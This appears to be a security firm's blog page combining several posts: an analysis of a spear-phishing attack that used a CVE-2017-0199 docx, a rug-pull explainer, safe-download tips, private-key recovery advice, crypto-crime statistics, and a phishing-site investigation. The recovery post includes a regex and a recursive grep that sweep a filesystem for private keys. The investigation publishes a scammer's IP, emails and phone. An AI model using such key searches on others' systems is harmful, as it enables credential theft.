Category: Alvosec

One of our followers asked us to explain the details about attack vector and how attackers gained unauthorized access. Despite the fact that there was not so many details shared about attack, we tried to gather as much as we can. Firstly Arthur_0x (victim) shared screenshot of email that he received, which was an entry point of attackers.

Suspected group behind this attack is known to perform high-quality social engineering attacks, such as this one. In this scenario, it appeared as a notification of a shared document via Google Drive, as it is shown in picture above.

We are aware that many users can be confused by such emails and don’t understand the technical details of it. Let’s begin by analyzing this email which victim received. First let’s brake all names by individual parts:

• Jarindr Thitadilaka – Founder of guildfiGlobal.

• Jehan Chu – Co-Founder of Kenetik

• Arthur Cheong (victim) – Founder of DeFianceCapital

So what really happened here?

From the picture above the chain of that email went in the following sequence:

Jehan -> Jarindr -> forwards -> Arthur

But it is obvious that forward message was altered, as you can see an empty space before google.com (drive-shares-dm-noreply@ google.com), and that was probably used to avoid triggering Google spam filters. Another important question is; why attackers used all those names?

Very likely for the purpose of raising the level of trust by using previously known people, that may be somehow connected with each other. Imagine if you received an email with some important data from someone you know. By that attacker will most definitely attract more attention and gain higher level of trust, unlike if you receive from someone that has no connection with you.

As securelist.com stated:

According to our research this year, we have seen BlueNoroff operators stalking and studying successful cryptocurrency startups. The goal of the infiltration team is to build a map of interactions between individuals and understand possible topics of interest. This lets them mount high-quality social engineering attacks that look like totally normal interactions. A document sent from one colleague to another on a topic, which is currently being discussed, is unlikely to trigger any suspicion. BlueNoroff compromises companies through precise identification of the necessary people and the topics they are discussing at a given time.

There is also one more detail if you look closely (via sendgrid.com).

According to their website (sendgrid.com) it seems to be a legitimate and reputable business, which is probably why Gmail accepts MIME header customization (or sender address forgery in the case of an attack) with nothing more than the short remark “via sendgrid.net”.

If we use non-reputable source and try to send unauthenticated message, Gmail will warn us:

Second phase of attack is concentrated on infecting a victim, by using this file: A Huge Risk of Stablecoin (Protected).docx. We have executed file in isolated environment, where we gather information to better understand how infection happened.

Malicious docx document is trying to exploit CVE-2017-0199, but before we continue you need to understand what CVE-2017-0199 vulnerability is.

Description of CVE-2017-0199:

A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Exploitation of this vulnerability requires that a user open or preview a specially crafted file with an affected version of Microsoft Office or WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file. The update addresses the vulnerability by correcting the way that Microsoft Office and WordPad parses specially crafted files, and by enabling API functionality in Windows that Microsoft Office and WordPad will leverage to resolve the identified issue.

Here you can see practical explanation of CVE-2017-0199 by security researcher Didier Stevens:

When a file is downloaded to a device running Windows, a Mark of the Web (MOTW) attribute is added to the file, identifying its source as being from the internet. Currently, when a user opens a file with the Mark of the Web (MOTW) attribute, a SECURITY WARNING banner appears, with an Enable content button. If the user selects Enable content, the file is considered a Trusted Document and macros are allowed to run. The macros will continue to run even after the change of default behavior to block macros in files from the internet is implemented, because the file is still considered a Trusted Document.

In that case document will give you security warning to enable content, which most of the time should be an indicator of possibly infected file.

The exploit relies on fetching remote content via an embedded URL inside one of the document meta files. Here you can see an example of malicious URL (secure.azureword.com), which was used to remotely download and proceed infection.

We used Whireshark to capture all HTTP traffic, as you can see from the picture Whireshark captured connection to secure.azureword.com (malicious domain):

IoC:

Once malware gains access to a system, it often looks to be there for a long time. This behavior is known as persistence.

Securelist.com has already visualize an infection chain:

After successful infection, attackers will monitor and track for any valuable data on victim’s PC, and from there, we can only imagine how valuable was for them crypto assets that victim owned.

Since this backdoor is not active anymore, we couldn’t execute fully, so this is only a summary of what happened in case of Arthur_0x. By saying that backdoor is not active anymore it doesn’t necessary mean that there will be no newer version and possibly more advanced than this one.

What is a rug pull?

Crypto rug pull is a theft where the owner of a crypto project abandons it after stealing investors’ money. They tend to be low-effort projects created by a few individuals with the goal of fleecing unsuspecting investors. It is most commonly mentioned when a token’s team removes liquidity.

The crypto world is susceptible to rug pulls due to loose regulations surrounding its operations. Unlike traditional companies where there is more strict control, the decentralised nature of crypto projects means the full control is left with private entities. This makes it open for exploitation by scammers, ransomware issuers, hackers and more.

Most of the time, rug pulls start as any other genuine crypto project. They can seem to be performing so well with massive value increases. This attracts genuine investors, only for the project to disappear after some time.

Types of rug pull

Here are the different types of rug pulls and how they happen.

Stealing liquidity

Stealing liquidity is the most common type of rug pull. It involves a fraud project developer listing an altcoin on a decentralised exchange (DEX), and pairing it with a top performing cryptocurrency like Ethereum (ETH). To make the created project tradable, the developer must create a liquidity pool which holds a certain amount of the currency.

The developer will then create a hype around the new project and attract investors to it. As more investors take up the token it starts rising in value, this will attract other investors who believe it is a viable opportunity. By this time, the investors will be exchanging their ETH with the new project at the liquidity pool.

Once the token becomes valuable, at a time of their choosing, the malicious developer will withdraw all the ETH from the liquidity pool. Investors in the pool will remain with no way to trade back their now worthless tokens if the investor cashes out the legit ETH from an exchange.

Technical manipulation

The other type of rug pull involves the developer of a crypto project disabling the ability to sell the tokens. In this scam, the developer exploits the “approve” function of the ERC-20 tokens. With the manipulation, the buyer would not be able to spend their tokens once purchased.

At the time of purchasing the token, an investor would think they can freely buy, sell, convert or spend their token in any way they wish. Only to later find out the spending abilities are limited to the developer or whom they choose as per the contract.

Once the token’s value grows high enough, the malicious developer sells all the tokens, making away with all the invested funds.

Developers cashing out

From the free market outlook, this does not look like a rug pull. However, given that it involves a token created for the sole purpose of fleecing investors, it does qualify to be one.

In this case, the developer shows the prospective investors a token feature or platform in development and that will soon be released. In reality, it’s a worthless token with no real purpose.

The developer gives themselves a bigger portion of the project. With the promise of good things to come, the investors put their money in the project increasing its value. The developer then cashes out their share either once or gradually, while the investors remain with the worthless tokens.

Examples of rug pulls

Here are some recent examples of rug pulls;

Squid game

Squid game rug pull is the latest and one of the biggest rug pulls in crypto history. Squid token was a play-to-earn token inspired by the Netflix hit TV series Squid Game.

The token experienced tremendous growth in the earlier weeks after launch, rising by more than 33,600% from a cent to hit $3.36.

The massive growth of the token ultimately hit $2861, before it suddenly vanished. Someone had dismantled the Squid token while it’s promoters became unreachable. By this time, more than 43,000 investors had put their money in the token.

The coin is currently worth $0.003028. At the same time, investors have also realized they cannot sell their tokens. The project developers had imposed an anti-dumping mechanism which meant no one could sell the tokens from Uniswap’s decentralised exchange. There is no hope that the investors will ever recover their money.

Luna Yield

Luna Yield was an ecological liquidity farming project running on the Solana (SOL) platform. The SOL project has been growing steadily, surpassing $2 billion in total locked value (TVL) before Luna Yield disappeared. The project’s developers suddenly deleted their website, Telegram and Twitter accounts and withdrew almost $10 million in liquidity.

Following the deletion of the social media accounts, the Luna Yield investors tried to unsuccessfully withdraw their unstaked funds, due to there being zero balance in the pool. On further investigations, the Luna Yield community established that the address of the developer of the project had approved the transactions leading to the rug pull.

OneCoin

OneCoin is one of the biggest Ponzi schemes ever in the crypto market. The developers of the project were able to get away with more than $4 billion from unsuspecting investors. Some of the leaders of the project were later arrested, while others disappeared while the project continued. To make it worse, OneCoin was never traded, neither could it be used to buy anything as it had no blockchain model or payment system.

As the crypto market expands, so does the risk of theft and scams. In 2021, over 1300 exit scams were pulled.

Common signs of a rug pull

Some of the common indications for a rug pull include;

Anonymous developers

The developers of a project are crucial when it comes to a crypto project. Even though the most successful crypto, Bitcoin, was created by an anonymous Satoshi Nakamoto, most altcoins have well known developers behind them.

Developers who prefer hiding behind pseudonyms might be planning to evade legal follow-ups once they have fleeced investors. Avoid such projects as much as you can.

The project appeared overnight

Crypto projects take time to develop and grow. However, with rug pulls they tend to come out of nowhere. They mostly use memes, culture and trends to reach a wide audience. For example, Squid token was inspired by the TV series hit, Squid Game. The developers understand investors were more likely to jump on hot trends.

These projects also tend to be accompanied with a lot of hype and promises that seem too good to be true.

Low liquidity

The liquidity of a project is the determinant of how fast you can convert it into cash. A low liquidity should be a red flag when it comes to investing in a project. At the same time, you also need to look for liquidity lockups. The lockup sets aside a certain amount of token at any given time needed for the pool to operate. It helps ensure the developers cannot empty the platform at once and get away with it.

Extensive marketing tactics

For a legit crypto project, its main selling point should be the use cases and the challenges it seeks to tackle. However, given that most rug pulls do not have any real use case or solution, they resort to aggressive marketing. They rely on social media posts, influencers and paid advertisements to reach as many people as possible.

Overnight value skyrocketing

The world operates like any other business whose values grow based on demand and supply. A legit project will have an explainable growth process. Therefore, in case a project grows in value out of nowhere, there is a likelihood of some few traders trying to use the FOMO tactic to lure investors.

How to avoid a rug pull

Losing money in an investment project is not easy to process. You therefore have to protect yourself from falling for rug pulls. Once you have mastered the signs of a rug pull, it is a little easier to detect one before falling victim.

You have to check for the signs before investing in a project. Analyze the project by first understanding what it is all about. Look into the developers, liquidity, its holders and listings on DEX platforms and reviews, whitepaper and social media.

You can also check for crypto scam detection site like Token Sniffer.

In the real world, many people would be suspicious about stepping into a shady-looking building with a sign that says “Free stuff!” in flashing lights. On the web, you should adopt a similar level of caution when entering unfamiliar websites that claim to offer free things.

We know it might be tempting to download that free video editing program or role-playing game, but do you really trust the website that’s offering it? Sometimes it helps to leave that website and search for reviews or information about that website or program before downloading or installing anything. Downloads are one of the main ways people get malware, so remember to think twice about what you’re downloading and where you’re downloading it from.

Whenever you see a website offering something for free, free tools, airdrops etc., double check before you trigger that button. Here are 6 easy steps to follow before you download something:

• check website reviews from legit source
• double check if URL is legit (attacker may change protonswap.com to something like protonsvvap.com)
• always download from official websites
• scan a file for malware, viruses using VirusTotal.com
• pay attention to the file extensions (document.zip.exe, document.pdf.exe)
• check the Integrity of a file or application

This is an example, how to check information before you download WebAuth app from App Store:

Malware is one of the biggest threats to the security of your computer, tablet, phone, and other devices. Malware includes viruses, spyware, ransomware, and other unwanted software that gets secretly installed onto your device. Once malware is on your device, criminals can use it to steal your sensitive information, crypto funds etc. They can also demand payment to decrypt data encrypted by ransomware, and make your device vulnerable to even more malware.

Data recovery is the process of recovering files from either deleted, damaged, formatted, inaccessible device from which cannot be accessed in a usual way. Loosing private key for your Proton wallet can happen in multiple ways and it doesn’t necessary mean that key is lost forever.

We will describe some possible scenarios where you might need to search in case you lost your private key.

Remember! Always make a backup of your private key! Read how you can back up WebAuth private key.

1. Check Google Drive and iCloud files for backup file

Always double check all files, where you might stored your backup file. Make sure that you checked for trash files by clicking Recently Deleted in the bottom-right corner of the window. You can read from the official site: Recover deleted files on iCloud.com.

2. If you accidentally deleted file it can be recovered

In case you accidentally deleted backup file from mobile device or desktop computer, you can recover it by using professional forensic software for data recovery.

We do not recommend using some of free tools, because they can permanently destroy data.

It’s always recommended to firstly create an image of drive and later try to recover it offline. Hire an expert to ensure that approach will be as effective as possible.

3. Search for key patterns using regex

Sometimes you can misplace backup file, so you can search by using regular expression. In case you lost EOS old format key, you can use this regex:

5[A-Z0-9a-z]{50}\b

Example of EOS private key:

5JjpaPGyMDfhTqUukvKzWacy…

Essentially it means any phrase starting with 5 and having 50 characters after it either A-Z, 0-9 or a-z. It also adds a \b at the end to signify end of line or string.

Example of newer format:

PVT_K1_2BLm5d9WrnJRmpB…

If private key starts with PVT_K1 then you need to search, something like this:

grep -Ril “PVT_K1” /

4. Check your clipboard history

If you have clipboard turned on, then you can check for clipboard history on Windows.

Go to Settings -> System -> (Scroll down to) Clipboard -> check if “Clipboard history” is on or off. To retrieve clipboard history press Windows logo key + V.

Check clipboard history on Android (keyboard -> clipboard icon) as there it is stored by default. Here is an example of copied private key:

5. Contact support

Try to contact support at support@xprnetwork.org and explain to them your situation.

According to latest Chainalysis crypto crime report, criminals are becoming crypto whales, currently holding over $25 billion in cryptocurrency. That represent around 3.7% of all crypto whales, those that hold more than $1 million in cryptocurrencies.

The report said: “Whereas stolen funds dominate overall criminal balances, darknet markets are the biggest source of illicit funds sent to criminal whales, followed by scams second and stolen funds third.”

Ransomware and crypto crime

Chainalysis identified just over $602 million worth of ransomware payments in 2021, which represent huge role in crypto crime.

Conti was the biggest ransomware strain by revenue in 2021, extorting at least $180 million from victims.

Believed to be based in Russia, Conti operates using the ransomware-as-a-service (RaaS) model, meaning Conti’s operators allow affiliates to launch attacks using its ransomware program in exchange for a fee.

Malware and cryptocurrency summarized

The report said: “Malware refers to malicious software that carries out harmful activity on a victim’s
device, usually without their knowledge. Malware-powered crime can be as simple as stealing information or money from victims, but can also be much more complex and grand in scale. For instance, malware operators who have infected enough devices can use those devices as a botnet, having them work in concert to carry out distributed denial-of-service (DDOS) attacks, commit ad fraud, or send spam emails to spread the malware further.”

Sample of malware strains by number of cryptocurrency transfers from victims | 2021

More than $3 billion stolen in 2021 as DeFi thefts leap 1,330%

Report says: “2021 was a big year for digital thieves. Throughout the year, $3.2 billion in cryptocurrency
was stolen from individuals and services — almost 6x the amount stolen in 2020.”

Total value stolen by type of attack | 2019–2021

Rug pulls are the latest innovation in scamming

Rug pulls have emerged as the go-to scam of the DeFi ecosystem, accounting for 37% of all cryptocurrency scam revenue in 2021, versus just 1% in 2020.

All in all, rug pulls took in more than $2.8 billion worth of cryptocurrency from victims in 2021.

Top 15 rug pulls by cryptocurrency value stolen | 2021

Always be cautious while opening attachments or links, never share sensitive information, back up your files, use antivirus and follow our blog for more security knowledge.

The rise in popularity of cryptocurrencies has encouraged cybercriminals to find innovative ways to attack markets, users and any structure where cryptocurrencies are stored. In simple words, if an attacker is able to exploit some area of a chain, smart contract, exchange or illegitimately withdraw cryptocurrency, it would be deemed as a hack or stealing. Scammers around the world took home a record of $14 billion in cryptocurrency in 2021.

Couple weeks ago we published an article: Investigation of websites and Telegram groups that are stealing private keys, so in case you missed it, read and learn how to recognize and avoid phishing websites.

Let’s begin…

Everything started with another scam group that promoted non-existing giveaway from Proton. Link led us to a phishing website, that tries to steal private keys from Proton users.

Never click on suspicious or malicious links, when you click on unverified links or download suspicious apps you increase the risk of exposure to malware.

When we tried to send a request (using dummy key), it called PHP file (access.php) and store somewhere on a server.

Luckily this scammer misconfigured server, which gave us ability to list through files (directory listing).

File named “_AbangMiun27_.txt” contained all the sensitive information, including private keys, IP addresses and time entries.

We checked those private keys and try to retrieve with which account they are associated. By converting from PVT_K1 to EOS older format gave us ability to find PUB_K1, but luckily all accounts were not holding any funds and there was no transfers.

We strongly advise all users that entered their private keys to change it. Soon we will publish article on how to change OWNER and ACTIVE keys.

Scammer IP address:

whois 36.69.126.151

inetnum:        36.69.112.0 – 36.69.127.255
descr:          PT TELKOM INDONESIA
descr:          STO Gambir 3rd Floor
descr:          Jl. Medan Merdeka Selatan No. 12
descr:          Jakarta 10110
country:        ID
admin-c:        AR165-AP
tech-c:         HM444-AP
abuse-c:        AI598-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-TELKOMNET
mnt-irt:        IRT-IDTELKOM-ID
last-modified:  2021-01-26T22:06:47Z
source:         APNIC

With this scam there was two associated email accounts:

• cimolly07@gmail.com

• abangmiun27@gmail.com

Admin Email: cimolly07@gmail.com
Registry Tech ID: Not Available From Registry
Tech Name: Ollie N/A
Tech Organization:  
Tech Street: jl,sudirman jl,sudirman  
Tech City: jakarta
Tech State/Province: DKI JAKARTA
Tech Postal Code: 56784
Tech Country: ID
Tech Phone: +62.82283737512
Tech Phone Ext:  
Tech Fax:  
Tech Fax Ext:  
Tech Email: cimolly07@gmail.com
Name Server: ns1.domosquare.com
Name Server: ns2.domosquare.com

Remember, there are more sophisticated attacks, scams out there, so act responsibly and carefully.

Learn how to back up your WebAuth private key, and remember never share your private key to anyone else.